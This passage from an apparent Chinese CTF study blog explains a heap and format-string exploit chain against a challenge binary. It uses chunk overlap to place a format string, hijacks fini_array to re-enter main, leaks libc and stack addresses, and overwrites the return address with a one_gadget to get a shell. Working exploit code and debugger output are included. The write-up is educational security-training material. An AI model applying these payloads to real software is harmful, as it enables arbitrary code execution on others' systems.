<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">strcpy</span>(a1, <span class="string">&quot;Order 1: &quot;</span>);</span><br><span class="line">v3 = <span class="built_in">strlen</span>(a2);</span><br><span class="line"><span class="built_in">strncat</span>(a1, a2, v3);</span><br><span class="line"><span class="built_in">strcat</span>(a1, <span class="string">&quot;\nOrder 2: &quot;</span>);</span><br><span class="line">v4 = <span class="built_in">strlen</span>(a3);</span><br><span class="line"><span class="built_in">strncat</span>(a1, a3, v4);</span><br><span class="line">*(_WORD *)&amp;a1[<span class="built_in">strlen</span>(a1)] = <span class="number">10</span>;</span><br></pre></td></tr></table></figure>
<p>执行 submit 函数后：</p>
<p>新申请的堆块 v5 里的内容是：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Order 1: + chunk1 + \n + Order 2: + chunk2 + \n</span><br></pre></td></tr></table></figure>
<p>而 chunk2 已经被 delete 掉了，故复制 chunk2 时其实复制的是 Order 1: +chunk1 + \n + Order 2:</p>
<p>所以 v5 里的内容应该是：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Order 1: + chunk1 + \n + Order 2: + Order 1: + chunk1 + \n + Order 2:</span><br></pre></td></tr></table></figure>
<p>所以如果我们想让 chunk1 的内容刚好为 dest 的起点，就需要满足：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">size（Order 1: + chunk1 + \n + Order 2: + Order 1:）==0x90</span><br><span class="line">size(chunk1)==0x90-28=0x74</span><br></pre></td></tr></table></figure>
<p>所以我们往 chunk1 里填入内容时，最后应该填入 0x80-0x74 个’\0’字符。</p>
<p>这样就能达到 chunk1 的内容刚好在 dest 的起点。</p>
<h3 id="构造第一次fmt"><a class="markdownIt-Anchor" href="#构造第一次fmt">#</a> 构造第一次 fmt</h3>
<p>第一次的目的有：</p>
<ul>
<li>
<p>修改 fini_array [0] 为 main 函数地址</p>
</li>
<li>
<p>泄露 libc_base</p>
</li>
<li>
<p>泄露一个栈地址（作用待会说）</p>
</li>
</ul>
<p>首先去修改 fini_array [0]，由于格式化字符串在堆上，本来应该栈迁移到堆上利用格式化字符串漏洞，但是之前说到奇怪的菜单输入长度就起作用了，利用奇怪的输入长度我们可以往栈上写入 fini_array [0] 的地址。</p>
<p>查看一下 fini_array [0] 处的值：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/x 0x6011b8</span><br><span class="line">0x6011b8:	0x00400830</span><br></pre></td></tr></table></figure>
<p>而 main 函数地址为 0x4003a9，因此我们只需要改后两位的地址。</p>
<p>同时找到 libc_start_main_240 的偏移为 31，顺便把该地址泄露出来。</p>
<p>最后，当我们成功执行第一次 fmt 后，程序会重新进入 main 函数，这时的 main 函数返回地址会与第一次执行的 main 函数有一个固定的偏移，我们最终的目的是改写第二次执行的 main 函数返回地址为 one_gadget 地址，因此我们需要获取第二次 main 函数的返回地址，因此需要找栈上一个不变的地址，借此算出第二次 main 函数返回地址。</p>
<p>gdb 断点打在 printf 上，在第一次 printf (dest) 时，我们调试后发现，栈上储存了一个栈上的地址，且两地址间固定偏移为 0xf0：</p>
<p><img data-src="https://tvax4.sinaimg.cn/large/008qDYGVgy1gwey52fhloj30ki0c6k14.jpg" alt="17"></p>
<p>该偏移为 28。</p>
<p>同时我们继续运行到第二次 printf (dest) 时，单步 n 执行下去，找到第二次 main 函数的返回地址：</p>
<p><img data-src="https://tva2.sinaimg.cn/large/008qDYGVgy1gwey58k21rj30va0mtaq9.jpg" alt="18"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0x7fffd740e4c0-0x7fffd740e2d8=0x1e8</span><br></pre></td></tr></table></figure>
<p>所以储存第二次 main 函数返回地址的栈地址我们也找到了。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">fini_array=<span class="number">0x6011b8</span> <span class="comment">#0x400830</span></span><br><span class="line">main_addr=<span class="number">0x400a39</span></span><br><span class="line">content1=<span class="string">b&#x27;%&#x27;</span>+<span class="built_in">str</span>(<span class="number">0xa39</span>).encode()+<span class="string">b&#x27;c%13$hn&#x27;</span></span><br><span class="line">content1+=<span class="string">b&#x27;-%31$p&#x27;</span>+<span class="string">b&#x27;-%28$p&#x27;</span></span><br><span class="line">content1=content1.ljust(<span class="number">0x74</span>,<span class="string">b&#x27;a&#x27;</span>)</span><br><span class="line">content1=content1.ljust(<span class="number">0x88</span>,<span class="string">b&#x27;\0&#x27;</span>)</span><br><span class="line">content1+=p64(<span class="number">0x151</span>)</span><br></pre></td></tr></table></figure>
<p>第一次 fmt 执行：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">delete(<span class="number">2</span>)</span><br><span class="line">edit(<span class="number">1</span>,content1)</span><br><span class="line">payload = <span class="string">b&#x27;fffffff&#x27;</span>+p64(fini_array)</span><br><span class="line">submit(payload)</span><br></pre></td></tr></table></figure>
<p>处理接受到的地址：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">r.recvuntil(<span class="string">&quot;-&quot;</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;-&quot;</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;-&quot;</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;-&quot;</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;-&quot;</span>)</span><br><span class="line">libc_start_main_240=<span class="built_in">int</span>(r.recv(<span class="number">14</span>),<span class="number">16</span>)</span><br><span class="line">libc_base=libc_start_main_240-<span class="number">0x20830</span><span class="comment">#调试计算libc_start_main_240与libc_base之间固定偏移为0x20830</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;libc_base:&quot;</span>+<span class="built_in">hex</span>(libc_base))</span><br><span class="line">r.recvuntil(<span class="string">&quot;-&quot;</span>)</span><br><span class="line">stack_addr = <span class="built_in">int</span>(r.recv(<span class="number">14</span>),<span class="number">16</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;stack_addr: &quot;</span>+<span class="built_in">hex</span>(stack_addr))</span><br><span class="line">one_gadget = libc_base+<span class="number">0x45216</span></span><br><span class="line">ret_addr = stack_addr-<span class="number">0x1e8</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;ret_addr: &quot;</span>+<span class="built_in">hex</span>(ret_addr))</span><br></pre></td></tr></table></figure>
<p>可以看到我们确实控制程序流程到执行第二次 main 函数</p>
<p><img data-src="https://tva2.sinaimg.cn/large/008qDYGVgy1gwey5g4v5uj30r006z3zm.jpg" alt="19"></p>
<h3 id="第二次执行fmt"><a class="markdownIt-Anchor" href="#第二次执行fmt">#</a> 第二次执行 fmt</h3>
<p>这次的任务只有一个了，改返回地址！前面我们已经获取到了 ret_addr，同样通过奇怪的菜单输入长度弄到栈上后，通过调试我们发现后 3 个字节都不同，因此我们需要两次 $hn 修改。</p>
<p>往栈上写 ret_addr，获取 one_gadget 低四位的值：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">payload2=<span class="string">b&#x27;fffffff&#x27;</span>+p64(ret_addr)+p64(ret_addr+<span class="number">2</span>)</span><br><span class="line">one_gadget = libc_base+<span class="number">0x45216</span></span><br><span class="line">low_byte=one_gadget&amp;<span class="number">0xffff</span></span><br><span class="line">high_byte=(one_gadget&gt;&gt;<span class="number">16</span>)&amp;<span class="number">0xffff</span></span><br></pre></td></tr></table></figure>
<p>然后开改！这里由于要使用两次 $hn，因此需要考虑前后字节数大小关系的问题，有两种解决方法：</p>
<p>①写一个 if-else 语句，调整 low_byte 和 high_byte 的修改顺序。</p>
<p>②像我一样，碰运气让 high_byte 大于 low_byte 就行（多运行一两次就行啦）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">content2=<span class="string">b&#x27;%&#x27;</span>+<span class="built_in">str</span>(low_byte).encode()+<span class="string">b&#x27;c&#x27;</span>+<span class="string">b&#x27;%13$hn&#x27;</span>+<span class="string">b&#x27;%&#x27;</span>+<span class="built_in">str</span>(high_byte-low_byte).encode()+<span class="string">b&#x27;c&#x27;</span>+<span class="string">b&#x27;%14$hn&#x27;</span></span><br><span class="line">content2=content2.ljust(<span class="number">0x74</span>,<span class="string">b&#x27;a&#x27;</span>)</span><br><span class="line">content2=content2.ljust(<span class="number">0x80</span>,<span class="string">b&#x27;\0&#x27;</span>)</span><br><span class="line">content2=content2+<span class="string">b&#x27;\0&#x27;</span>*<span class="number">8</span>+p64(<span class="number">0x151</span>)</span><br><span class="line">delete(<span class="number">2</span>)</span><br><span class="line">edit(<span class="number">1</span>,content2)</span><br><span class="line">submit(payload2)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<p>最后成功 getshell！</p>
<h2 id="fini_array"><a class="markdownIt-Anchor" href="#fini_array">#</a> fini_array</h2>
<ul>
<li>
<p>main 函数并不是程序的起点，也不是程序的终点</p>
</li>
<li>
<p><img data-src="https://tva4.sinaimg.cn/large/008qDYGVgy1gwey44yn0yj30kl0hnta5.jpg" alt="14"></p>
</li>
<li>
<p>图片出处:<span class="exturl" data-url="aHR0cDovL2RicC1jb25zdWx0aW5nLmNvbS90dXRvcmlhbHMvZGVidWdnaW5nL2xpbnV4UHJvZ3JhbVN0YXJ0dXAuaHRtbA==">http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html</span></p>
</li>
<li>
<p>fini_array 是 libc_csu_fini 函数里面的一个列表，当函数退出时会调用这个数组里面储存的一个或者两个函数，然后程序才会真正退出。</p>
</li>
<li>
<p><strong>静态链接程序</strong>：fini_array 数组大小为 0x10，储存了两个地址，分别是 fini_array [0] 和 fini_array [1]，退出程序时先执行 fini_array [1] 再执行 fini_array [0]，因此在静态程序中，我们可以令 fini_array [1] 的地址为一个地址 P，然后再令 fini_array [0] 的地址为 libc_csu_fini 的地址，这样就能达到循环执行地址 p 处的代码，直到 fini_array [0] 被覆盖为其他值。</p>
</li>
<li>
<p><strong>动态链接程序</strong>：fini_array 数组大小为 0x8，只储存了一个 fini_array [0]，因此对 fini_array 的劫持只能利用一次，不能像静态链接程序那样无限循环使用</p>
</li>
</ul>
<h3 id="如何找fini_array"><a class="markdownIt-Anchor" href="#如何找fini_array">#</a> 如何找 fini_array?</h3>
<p>1.64 位动态链接程序：</p>
<p>​		①查看符号表：在 gdb 中用 elf 命令，.fini_array 开始的地址就是 fini_array [0] 的地址：</p>
<p>​		<img data-src="https://tvax4.sinaimg.cn/large/008qDYGVgy1gwey4drin8j30e50c4wkf.jpg" alt="15"></p>
<p>​		②在 IDA 里 ctrl+s 寻找 fini_array：</p>
<p>​	<img data-src="https://tvax1.sinaimg.cn/large/008qDYGVgy1gwey4jrzuij313o0hrtv5.jpg" alt="16"></p>
<p>2.64 位静态链接程序：</p>
<p>​		64 位静态链接程序是没有符号表的，寻找 fini_array 的方法：</p>
<p>​		(1) readelf -h programname 查看程序入口地址，gdb 将断点打在程序入口地址处。</p>
<p>​		(2) 然后找到类似于如下的代码片段：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mov     r8, offset sub_403B20 ; fini</span><br></pre></td></tr></table></figure>
<p>​		(3) 用 x/i 命令去查看 0x403B20 地址处。像如下这种即为 fini_array 的地址。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">lea    rax,[rip+0xb24f8]#fini_array[0]</span><br><span class="line">lea    rbp,[rip+0xb2501]#fini_array[1]</span><br></pre></td></tr></table></figure>

      <div class="tags">
          <a href="/tags/%E5%A0%86/" rel="tag"><i class="ic i-tag"></i> 堆</a>
      </div>
  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2021-11-14 20:23:01" itemprop="dateModified" datetime="2021-11-14T20:23:01+08:00">2021-11-14</time>
  </span>
  <span id="2021/10/24/堆学习笔记-chunk overlapping/" class="item leancloud_visitors" data-flag-title="堆学习-Chunk Overlapping" title="阅读次数">
      <span class="icon">
        <i class="ic i-eye"></i>
      </span>
      <span class="text">阅读次数</span>
      <span class="leancloud-visitors-count"></span>
      <span class="text">次</span>
  </span>
</div>

      
<div class="reward">
  <button><i class="ic i-heartbeat"></i> 赞赏</button>
  <p>请我喝[茶]~(￣▽￣)~*</p>
  <div id="qr">
      
      <div>
        <img data-src="/images/wechatpay.png" alt="Loτυs 微信支付">
        <p>微信支付</p>
      </div>
      
      <div>
        <img data-src="/images/alipay.png" alt="Loτυs 支付宝">
        <p>支付宝</p>
      </div>
  </div>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>Loτυs <i class="ic i-at"><em>@</em></i>清風微醺
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="https://www.wdqjxtmph.top/2021/10/24/%E5%A0%86%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-chunk%20overlapping/" title="堆学习-Chunk Overlapping">https://www.wdqjxtmph.top/2021/10/24/堆学习笔记-chunk overlapping/</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2021/09/25/%E7%94%B5%E7%A7%91%E6%96%B0%E7%94%9F%E8%B5%9B/" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;tva2.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1gipewkhf1zj20zk0m81kx.jpg" title="电科新生赛">
  <span class="type">上一篇</span>
  <span class="category"><i class="ic i-flag"></i> CTF</span>
  <h3>电科新生赛</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/2021/10/30/%E5%A0%86%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-UAF/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;tva2.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1gipeun65urj20zk0m81ii.jpg" title="堆学习-UAF">
  <span class="type">下一篇</span>
  <span class="category"><i class="ic i-flag"></i> 学习笔记</span>
  <h3>堆学习-UAF</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
          <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#chunk-extend"><span class="toc-number">1.</span> <span class="toc-text"> Chunk Extend</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9E%E7%8E%B0%E6%9D%A1%E4%BB%B6"><span class="toc-number">1.1.</span> <span class="toc-text"> 实现条件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9E%E7%8E%B0%E5%8E%9F%E7%90%86"><span class="toc-number">1.2.</span> <span class="toc-text"> 实现原理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9E%E7%8E%B0%E6%AD%A5%E9%AA%A4"><span class="toc-number">1.3.</span> <span class="toc-text"> 实现步骤</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BE%8B%E9%A2%98%E4%B8%80"><span class="toc-number">2.</span> <span class="toc-text"> 例题一</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%BA%E6%9C%AC%E6%80%9D%E8%B7%AF"><span class="toc-number">2.1.</span> <span class="toc-text"> 基本思路</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E7%8E%B0%E6%AD%A5%E9%AA%A41"><span class="toc-number">2.1.1.</span> <span class="toc-text"> 实现步骤①：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9E%E7%8E%B0%E6%AD%A5%E9%AA%A42"><span class="toc-number">2.1.2.</span> <span class="toc-text"> 实现步骤②：</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#exp"><span class="toc-number">2.2.</span> <span class="toc-text"> exp：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BE%8B%E9%A2%98%E4%BA%8C"><span class="toc-number">3.</span> <span class="toc-text"> 例题二：</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%87%BD%E6%95%B0"><span class="toc-number">3.1.</span> <span class="toc-text"> 漏洞函数</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A0%86%E6%BA%A2%E5%87%BA"><span class="toc-number">3.1.1.</span> <span class="toc-text"> 堆溢出</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#uaf"><span class="toc-number">3.1.2.</span> <span class="toc-text"> UAF</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E"><span class="toc-number">3.1.3.</span> <span class="toc-text"> 格式化字符串漏洞</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A5%87%E6%80%AA%E7%9A%84%E5%AD%97%E7%AC%A6%E8%BE%93%E5%85%A5%E9%95%BF%E5%BA%A6"><span class="toc-number">3.1.4.</span> <span class="toc-text"> 奇怪的字符输入长度</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%9D%E8%B7%AF%E5%88%86%E6%9E%90"><span class="toc-number">3.2.</span> <span class="toc-text"> 思路分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%B7%E4%BD%93%E5%AE%9E%E7%8E%B0"><span class="toc-number">3.3.</span> <span class="toc-text"> 具体实现：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9E%84%E9%80%A0%E7%AC%AC%E4%B8%80%E6%AC%A1fmt"><span class="toc-number">3.3.1.</span> <span class="toc-text"> 构造第一次 fmt</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E4%BA%8C%E6%AC%A1%E6%89%A7%E8%A1%8Cfmt"><span class="toc-number">3.3.2.</span> <span class="toc-text"> 第二次执行 fmt</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#fini_array"><span class="toc-number">3.4.</span> <span class="toc-text"> fini_array</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A6%82%E4%BD%95%E6%89%BEfini_array"><span class="toc-number">3.4.1.</span> <span class="toc-text"> 如何找 fini_array?</span></a></li></ol></li></ol></li></ol>
      </div>
      <div class="related panel pjax" data-title="系列文章">
        <ul>
          <li class="active"><a href="/2021/10/24/%E5%A0%86%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-chunk%20overlapping/" rel="bookmark" title="堆学习-Chunk Overlapping">堆学习-Chunk Overlapping</a></li><li><a href="/2021/10/30/%E5%A0%86%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-UAF/" rel="bookmark" title="堆学习-UAF">堆学习-UAF</a></li>
        </ul>
      </div>
      <div class="overview panel" data-title="站点概览">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="Loτυs"
      data-src="/images/avatar.jpg">
  <p class="name" itemprop="name">Loτυs</p>
  <div class="description" itemprop="description">凌恒山其若陋兮、</div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">20</span>
        <span class="name">文章</span>
      </a>
    </div>
    <div class="item categories">
      <a href="/categories/">
        <span class="count">2</span>
        <span class="name">分类</span>
      </a>
    </div>
    <div class="item tags">
      <a href="/tags/">
        <span class="count">6</span>
        <span class="name">标签</span>
      </a>
    </div>
</nav>

<div class="social">
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>首页</a>
  </li>

    
  <li class="item">
    <a href="/about/" rel="section"><i class="ic i-user"></i>关于</a>
  </li>

        
  <li class="item dropdown">
      <a href="/default/" rel="section"><i class="ic i-feather"></i>文章</a>
    <ul class="submenu">

        
  <li class="item">
    <a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a>
  </li>

        
  <li class="item">
    <a href="/categories/" rel="section"><i class="ic i-th"></i>分类</a>
  </li>

        
  <li class="item">
    <a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a>
  </li>

  </ul>

</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
        <a href="/2021/09/25/%E7%94%B5%E7%A7%91%E6%96%B0%E7%94%9F%E8%B5%9B/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a>
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
        <a href="/2021/10/30/%E5%A0%86%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-UAF/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a>
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>随机文章</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2021/09/07/Libcsearcher%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE/" title="LibcSearcher环境配置和ubuntu更新换源问题">LibcSearcher环境配置和ubuntu更新换源问题</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2022/03/13/Tcache%20bin%E6%80%BB%E7%BB%93/" title="Tcachebin 总结">Tcachebin 总结</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2022/02/02/%E5%88%A9%E7%94%A8realloc%E8%B0%83%E6%95%B4%E6%A0%88%E4%BD%BFone_gadget%E7%94%9F%E6%95%88/" title="利用realloc调整栈使one_gadget生效">利用realloc调整栈使one_gadget生效</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2022/04/06/wustctf2020_babyfmt/" title="wustctf2020_babyfmt">wustctf2020_babyfmt</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" title="分类于 学习笔记">学习笔记</a>
</div>

    <span><a href="/2021/10/24/%E5%A0%86%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-chunk%20overlapping/" title="堆学习-Chunk Overlapping">堆学习-Chunk Overlapping</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2021/11/29/SCU%E6%96%B0%E7%94%9F%E8%B5%9B2021/" title="SCU新生赛2021 pwn wp">SCU新生赛2021 pwn wp</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2021/08/20/string/" title="攻防世界string wp 以及个人对格式化字符漏洞偏移量的一些理解">攻防世界string wp 以及个人对格式化字符漏洞偏移量的一些理解</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/11/19/kernel2own/" title="未命名">未命名</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
</div>

    <span><a href="/2022/12/01/hitcon-wtfshell/" title="未命名">未命名</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2022/08/17/%E5%B7%85%E5%B3%B0%E6%9E%81%E5%AE%A2/" title="2022巅峰极客pwn wp">2022巅峰极客pwn wp</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>最新评论</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2010 – 
    <span itemprop="copyrightYear">2023</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Loτυs @ Loτυs</span>
  </div>
  <div class="powered-by">
    基于 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2021/10/24/堆学习笔记-chunk overlapping/',
    favicon: {
      show: "（●´3｀●）やれやれだぜ",
      hide: "(´Д｀)大変だ！"
    },
    search : {
      placeholder: "文章搜索",
      empty: "关于 「 ${query} 」，什么也没搜到",
      stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,fancybox: true,copyright: '复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




</body>
</html>
